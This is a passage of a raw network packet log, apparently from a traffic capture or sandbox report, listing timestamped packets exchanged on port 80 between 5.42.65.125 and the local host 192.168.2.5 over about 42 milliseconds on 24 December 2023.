Dec 24, 2023 10:44:34.177524090 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.177568913 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.177612066 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.178241968 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.178342104 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.178392887 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.178457975 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.178594112 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.178814888 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.178973913 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.179043055 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.179503918 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.179555893 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.179588079 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.179840088 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.179886103 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.179923058 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.179941893 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.179966927 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.180056095 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.180538893 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.180557966 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.180583000 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.180608034 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.180852890 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.180903912 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.180948019 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.180949926 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.181024075 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.181066990 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.181116104 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.181947947 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.182015896 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.182069063 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.182076931 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.182137012 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.182166100 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.182200909 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.182631969 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.182893991 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.182914972 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.182969093 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.182988882 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.183135033 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.183253050 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.183299065 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.183830023 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.183933973 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.183960915 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.184014082 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.184040070 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.184084892 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.184098005 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.184145927 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.184772015 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.185060978 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.185075998 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.185107946 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.185112953 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.185158968 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.185184002 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.185728073 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.185761929 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.185823917 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.185836077 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.185874939 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.185902119 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.185928106 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.185946941 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.186719894 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.186775923 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.186827898 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.186831951 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.186886072 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.186923981 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.186965942 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.187690973 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.187762022 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.187792063 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.187803030 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.187855005 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.187891960 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.187957048 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.188052893 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.188620090 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.188669920 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.188708067 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.188714981 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.188757896 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.188801050 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.188848972 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.189640999 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.189692974 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.189726114 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.189829111 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.189882994 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.189918995 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.190052986 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.190596104 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.190627098 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.190648079 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.190685034 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.190707922 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.190726042 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.190752029 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.190817118 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.191574097 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.191617012 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.191725969 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.191737890 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.191771030 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.191797972 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.191865921 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.191930056 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.192400932 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.192481995 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.192528009 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.192677021 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.192749023 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.192794085 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.192796946 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.193284988 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.193339109 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.193384886 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.193440914 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.193481922 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.193492889 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.193527937 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.193568945 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.194349051 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.194485903 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.194535971 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.194560051 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.194574118 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.194610119 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.194695950 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.195173025 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.195218086 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.195266008 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.195296049 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.195336103 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.195377111 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.195384979 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.195422888 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.196136951 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.196197033 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.196257114 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.196317911 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.196379900 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.196444035 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.196487904 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.197096109 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.197134018 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.197144032 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.197181940 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.197226048 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.197268963 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.197448969 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.197494984 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.198036909 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.198154926 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.198168039 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.198213100 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.198254108 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.198365927 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.198412895 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.198904991 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.198961973 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.199003935 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.199044943 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.199090004 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.199129105 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.199162960 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.199202061 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.199839115 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.199915886 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.199959993 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.199973106 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.200021982 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.200062990 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.200071096 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.200846910 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.200912952 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.200939894 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.200999975 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.201037884 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.201077938 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.201145887 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.201194048 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.201698065 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.201754093 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.201793909 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.201826096 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.202044964 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.202090025 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.202095985 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.202591896 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.202621937 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.202644110 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.202676058 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.202760935 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.202805996 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.202917099 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.203448057 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.203500986 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.203541994 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.203577995 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.203623056 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.203671932 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.203704119 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.203723907 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.204369068 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.204406977 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.204456091 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.204463959 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.204495907 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.204536915 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.204554081 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.205269098 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.205310106 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.205312014 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.205372095 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.205414057 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.205468893 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.205513954 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.205544949 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.206214905 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.206259012 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.206269026 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.206311941 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.206331968 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.206357002 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.206397057 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.206438065 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.207112074 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.207166910 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.207204103 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.207211018 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.207267046 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.207314968 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.207330942 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.207997084 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.208062887 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.208134890 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.208169937 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.208174944 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.208199024 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.208273888 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.208600044 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.208887100 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.208936930 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.209028959 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.209048033 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.209103107 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.209141970 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.209261894 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.209964991 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.210062981 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.210124016 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.210139990 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.210186958 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.210230112 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.210261106 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.210299015 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.210640907 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.210798979 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.210844994 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.210869074 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.210901022 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.210942030 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.210995913 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.211525917 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.211570024 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.211709976 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.211795092 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.211843014 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.211899996 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.211963892 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.212006092 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.212373018 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.212424994 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.212470055 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.212481022 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.212563992 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.212640047 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.212692976 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.213255882 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.213367939 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.213422060 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.213429928 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.213529110 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.213572025 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.213677883 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.213722944 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.214232922 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.214471102 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.214519024 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.214704990 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.214756012 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.214803934 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.214813948 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.215081930 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.215156078 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.215204000 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.215245008 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.215286016 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.215338945 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.215390921 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.215919971 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.215972900 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.215981960 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.216016054 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.216025114 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.216075897 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.216119051 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.216176033 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.216893911 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.216943979 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.217144012 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.217262030 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.217304945 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.217355967 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.217434883 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.217557907 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.217612982 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.217617035 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.217751026 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.217797041 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.217855930 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.218099117 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.218142986 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.218487024 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.218527079 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.218760014 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.218786001 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.218842983 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.218904018 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.218966961 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.219008923 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.219310045 CET	80	49724	5.42.65.125	192.168.2.5
